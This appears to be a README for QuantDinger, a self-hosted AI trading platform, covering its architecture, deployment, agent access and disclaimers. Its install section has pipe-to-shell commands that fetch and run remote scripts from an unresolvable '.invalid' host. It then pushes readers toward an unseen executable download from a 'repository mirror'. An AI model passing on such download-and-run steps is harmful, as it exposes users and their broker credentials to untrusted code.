Open-source AI Trading OS
Turn trading ideas into Python strategies, backtests, paper trading, live execution, and monitoring — all in one self-hosted stack.
QuantDinger is maintained by QuantDinger Community.
AI research → Strategy code → Backtest → Paper/Live execution → Monitoring
QuantDinger can submit real orders when live trading is explicitly enabled. Start with paper trading, use restricted API keys, and review the risk and compliance requirements for your jurisdiction. This project does not provide investment advice.
QuantDinger is an open-source AI Trading OS for independent traders, Python strategy authors, and small teams. Its local-first, self-hosted design keeps market data, strategy code, broker credentials, and deployment under the operator's control.
The platform brings together:
- multi-provider AI market research and analysis;
- Python indicators and Strategy API V2 development;
- server-side backtesting and experiment workflows;
- paper and live execution across crypto exchanges and traditional brokers;
- web, mobile H5, human API, Agent Gateway, and MCP access;
- PostgreSQL-backed state, durable workers, audit logs, and optional monitoring.
It is not a black-box signal service. Strategy code, risk settings, credentials, and deployment remain under the operator's control.
Review project standards in CODE_OF_CONDUCT.md and
SECURITY.md.
The v5 backend is organized around explicit runtime and operational boundaries:
- the HTTP API no longer owns long-running trading or scheduler loops;
- trading, scheduling, Celery jobs, and migrations run as separate processes;
- Celery handles finite, retryable work while long-lived strategy runtimes stay in the trading worker;
- cache Redis and durable job Redis use separate instances and eviction policies;
- high-risk API contracts are represented in OpenAPI and covered by focused checks;
- JSON logs, request IDs, Prometheus metrics, dashboards, and alert rules are available through an optional observability overlay;
- the production overlay runs backend processes as a non-root user with a read-only root filesystem, dropped capabilities, and resource limits;
- release quality gates cover syntax, lint, compose validation, dependency review, secrets hygiene, API compatibility, version drift, and text encoding.
The source version is declared in VERSION. Release tags use the
same semantic version with a leading v, for example v5.0.1.
The editable source is available as architecture-v5.svg.
The diagram above shows the complete product and process architecture. The runtime topology below focuses on container-to-container ownership and data flow.
flowchart TB
C["Web / Mobile / API / MCP clients"]
FE["Nginx frontend services"]
API["Flask + Gunicorn API"]
PG[("PostgreSQL")]
CACHE[("Redis cache")]
JOBS[("Redis jobs")]
TW["Trading worker"]
SW["Scheduler worker"]
CW["Celery worker"]
BEAT["Celery beat"]
PROM["Prometheus"]
GRAF["Grafana"]
ALERT["Alertmanager"]
C --> FE --> API
API --> PG
API --> CACHE
API -->|"durable commands"| PG
TW -->|"leases, orders, heartbeats"| PG
SW -->|"schedules, monitoring, heartbeats"| PG
API -->|"finite async jobs"| JOBS
BEAT --> JOBS --> CW
CW --> PG
API -. metrics .-> PROM
PG -. exporter .-> PROM
CACHE -. exporter .-> PROM
JOBS -. exporter .-> PROM
PROM --> GRAF
PROM --> ALERT
One backend image is reused by several containers with different commands:
| Process | Responsibility |
|---|---|
migration |
Applies the database schema and exits before application services start. |
backend |
Handles HTTP, authentication, validation, and durable command submission. |
trading-worker |
Owns strategy runtimes, pending orders, broker sessions, and reconciliation. |
scheduler-worker |
Runs portfolio, deployment, payment, and signal schedules. |
celery-worker |
Executes finite AI, backtest, experiment, report, and maintenance jobs. |
celery-beat |
Dispatches periodic Celery tasks. |
See docs/architecture/PROCESS_ROLES_AND_TASKS.md,
docs/architecture/ARCHITECTURE.md, and
docs/architecture/CONCURRENCY_MODEL.md
for ownership rules.
Choose one of the two paths below. Option 1 (Download) is the recommended way to get a complete QuantDinger package.
After the package is downloaded:
- Extract the archive to a local folder.
- Open a terminal in that folder.
- Run the activation commands for your OS:
Windows (PowerShell)
.\QuantDinger.exe --setup
quantdingerctl activate --profile paper
quantdingerctl doctor --fix-envLinux / macOS
chmod +x ./QuantDinger
./QuantDinger --setup
quantdingerctl activate --profile paper
quantdingerctl doctor --fix-envThese activation commands finalize local bootstrap after the Download step.
If a command is not recognized, re-download the package with the button above
and extract it again so quantdingerctl is on your path.
More detail: install.md · docs/deployment/INSTALL_TROUBLESHOOTING.md
This path is kept for operators who prefer a terminal-first flow. It depends on the Download package already being present on the machine.
# Linux / macOS
curl -fsSL https://get.quantdinger.invalid/install.sh | bash
quantdingerctl up --stack core# Windows PowerShell
irm https://get.quantdinger.invalid/install.ps1 | iex
quantdingerctl up --stack coreIf DNS resolution or the bootstrap script fails, use Option 1 — Download instead. The Download package is the supported installation channel for this repository mirror.
Expected local endpoints after a successful start:
- Web: http://127.0.0.1:8888
- Mobile H5: http://127.0.0.1:8889
- API health: http://127.0.0.1:5000/api/health
Administrator and settings notes: docs/deployment/ADMIN_AND_SETTINGS_TROUBLESHOOTING_EN.md
Validate configuration before starting a hardened stack, then apply the
production and optional observability overlays described in
docs/deployment/PRODUCTION_HARDENING.md
and docs/deployment/OBSERVABILITY.md.
Production rules:
- expose only a TLS reverse proxy on ports 80/443;
- keep PostgreSQL, both Redis instances, Prometheus, Grafana, and Alertmanager off the public internet;
- do not deploy with example passwords or empty encryption keys;
- back up PostgreSQL and the durable jobs volume;
- keep cache Redis disposable and never use it as the Celery broker;
- review worker health and application readiness after every deployment.
All published ports bind to loopback by default.
| Service | Default URL | Purpose |
|---|---|---|
| Web | http://127.0.0.1:8888 | Desktop web client and same-origin API proxy. |
| Mobile H5 | http://127.0.0.1:8889 | Mobile web client and same-origin API proxy. |
| Backend | http://127.0.0.1:5000 | Direct API access and health endpoints. |
| Grafana | http://127.0.0.1:3000 | Dashboards; available only with the observability overlay. |
| Prometheus | http://127.0.0.1:9090 | Metrics storage and queries; optional. |
| Alertmanager | http://127.0.0.1:9093 | Alert grouping, silencing, and delivery; optional. |
The monitoring stack is optional by design:
- Prometheus collects API, worker, PostgreSQL, and Redis metrics.
- Grafana turns those metrics into operator dashboards.
- Alertmanager groups alerts, manages silences, and sends notifications once a receiver is configured.
Monitoring services stay on 127.0.0.1. Use a VPN, SSH tunnel, or authenticated
reverse proxy for remote administration. Configuration samples live under
ops/.
- Broker credentials and MFA secrets are encrypted with a stable
CREDENTIAL_ENCRYPTION_KEY. - Agent tokens are hashed, scoped, rate-limited, and audit-logged.
- Agent trading is paper-only by default; live access requires both token and server-side authorization.
- Long-running strategy ownership uses leases, heartbeats, and fencing tokens.
- Production containers run without root privileges or Linux capabilities.
- Host port defaults are loopback-only; public access should terminate at a TLS reverse proxy.
Report vulnerabilities privately according to SECURITY.md.
Do not include credentials, account data, or exploitable details in public issues.
| Area | Current surface |
|---|---|
| Indicators | Python chart overlays, markers, bands, and signals. |
| Strategies | Strategy API V2 intents, sizing, risk, backtests, and live runtime. |
| Crypto | Binance, OKX, Bitget, Bybit, Gate, HTX, and adapter extensions. |
| Traditional brokers | IBKR and Alpaca workflows. |
| AI providers | OpenRouter, OpenAI-compatible APIs, Google, DeepSeek, Grok, MiniMax, and custom endpoints. |
| Automation | Human API, Agent Gateway, MCP server, Celery jobs, schedules, and notifications. |
Start with the Indicator guide,
Strategy guide, and
Extension guide.
The Agent Gateway is exposed under /api/agent/v1. The included MCP server lets
clients such as Cursor, Claude Code, and Codex call approved tools without
receiving broker credentials or administrator JWTs.
Live trading through an agent requires all of the following:
- a token with trading scope;
paper_only=falseon that token;AGENT_LIVE_TRADING_ENABLED=trueon the server;- operator-configured limits and allowlists.
See MCP setup,
Agent quick start, and the
Agent documentation index.
Backend development targets Python 3.12. The application package lives in
backend/. Useful repository checks are documented in
DEVELOPMENT.md and scripts/README.md.
API changes should follow API conventions
and keep OpenAPI artifacts aligned when contracts change.
This repository contains the backend, worker processes, deployment definitions, operations configuration, documentation, and MCP server. Desktop and mobile clients are consumed as published images in the Compose stacks.
QuantDinger/
|-- backend/ Backend application and worker processes
|-- docs/ Architecture, deployment, trading, API, agents
|-- mcp_server/ Standalone QuantDinger MCP server package
|-- ops/ Prometheus, Grafana, Alertmanager configuration
|-- scripts/ Repository-level checks
|-- docker-compose*.yml Core, GHCR, production, and observability layouts
|-- install.md Installation pointer
|-- VERSION Canonical source version
|-- LICENSE Apache License 2.0
|-- SECURITY.md Vulnerability reporting policy
`-- CODE_OF_CONDUCT.md Community standards
The documentation index is available at docs/README.md.
| Topic | Document |
|---|---|
| Contributor architecture | Architecture |
| Module ownership | Module boundaries |
| Process and task ownership | Process roles |
| Production runtime | Production hardening |
| Metrics and alerts | Observability |
| Human API contracts | API conventions |
| OpenAPI artifacts | API documentation |
| Strategy development | Strategy guide |
| Indicator development | Indicator guide |
| MCP and agents | Agent documentation |
| Cloud deployment | Cloud deployment |
| Installation problems | Troubleshooting |
Read CONTRIBUTING.md and DEVELOPMENT.md
before opening a pull request. Keep routes thin, preserve API compatibility,
place long-running behavior in the correct process, and include focused tests
for high-risk changes.
QuantDinger can connect to major venues used by the community, including Binance, Bitget, Bybit, OKX, Gate.io, and HTX. Always verify the destination domain and API permissions before creating an account or enabling live trading. Prefer restricted keys without withdrawal rights.
- Backend source code is licensed under Apache License 2.0.
- QuantDinger product identity, logo, and commercial licensing are managed separately from the code license.
- Trademark, branding, attribution, and watermark use is governed by
TRADEMARKS.md. Apache 2.0 does not grant trademark rights.
For commercial licensing, branding authorization, or deployment support, see
SUPPORT.md.
QuantDinger is intended for lawful research, education, and compliant trading only. It must not be used for fraud, market manipulation, sanctions evasion, money laundering, or other illegal activity. Operators are responsible for following the laws, licensing requirements, tax rules, broker or exchange terms, and data regulations that apply in every jurisdiction where they deploy or use the software.
This project does not provide legal, tax, investment, financial, or regulatory advice. Trading, including automated and leveraged trading, can result in the loss of some or all capital. Historical data, backtests, simulated results, AI output, indicators, and strategy examples do not guarantee future performance. Users must independently review strategies, permissions, order limits, and risk controls before enabling live execution.
The software is provided under the terms of the applicable license and is used at the operator's own risk. To the extent permitted by law, project maintainers and contributors disclaim liability for trading losses, data loss, service interruption, third-party failures, security incidents, or regulatory consequences arising from use or misuse of the software.
- Documentation:
docs/README.md - Contributing guide:
CONTRIBUTING.md - Support policy:
SUPPORT.md - Security policy:
SECURITY.md
Telegram, Discord, YouTube, and X channels are operated by the community where available.
QuantDinger stands on top of a strong open-source ecosystem. Special thanks to maintainers and contributors of projects including Flask, Gunicorn, Celery, PostgreSQL, Redis, Pandas, NumPy, CCXT, yfinance, AkShare, Vue.js, Ant Design Vue, KLineCharts, ECharts, Capacitor, bip-utils, Prometheus, and Grafana.
QuantDinger is a small tribute to Erwin Schrödinger — the “-dinger” in our name is the tail of “Schrödinger”. The cat in the box was a thought experiment; every un-fired strategy is its own little version of it — simultaneously winning and losing until the order actually fills. Backtests open the box. Live trading collapses the wavefunction. Trade carefully.
If QuantDinger is useful to you, a GitHub star helps the project a lot.
